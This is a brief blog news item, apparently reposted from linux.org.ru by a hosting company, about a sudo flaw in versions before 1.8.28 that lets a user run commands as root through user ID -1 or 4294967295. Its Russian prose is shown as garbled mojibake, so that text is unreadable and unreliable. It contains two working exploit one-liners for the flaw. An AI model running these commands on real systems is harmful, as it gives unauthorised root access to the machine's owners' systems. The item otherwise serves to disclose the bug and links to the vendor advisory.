ProHoster > Π‘Π»ΠΎΠ³ > Новости ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚Π° > Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² sudo

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² sudo

Ошибка Π² sudo позволяСт Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΎΡ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ root любой исполняСмый Ρ„Π°ΠΉΠ», Ссли Π² /etc/sudoers Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΎ Π΅Π³ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΎΡ‚ Π΄Ρ€ΡƒΠ³ΠΈΡ… ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΈ Π·Π°ΠΏΡ€Π΅Ρ‰Π΅Π½ΠΎ для root.

Эксплуатация ошибки ΠΎΡ‡Π΅Π½ΡŒ простая:

sudo -u#-1 id -u <command>

ΠΈΠ»ΠΈ:

sudo -u#4294967295 id -u <command>

Ошибка присутствуСт Π²ΠΎ всСх вСрсиях sudo Π΄ΠΎ 1.8.28

ΠŸΠΎΠ΄Ρ€ΠΎΠ±Π½ΠΎΡΡ‚ΠΈ:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: linux.org.ru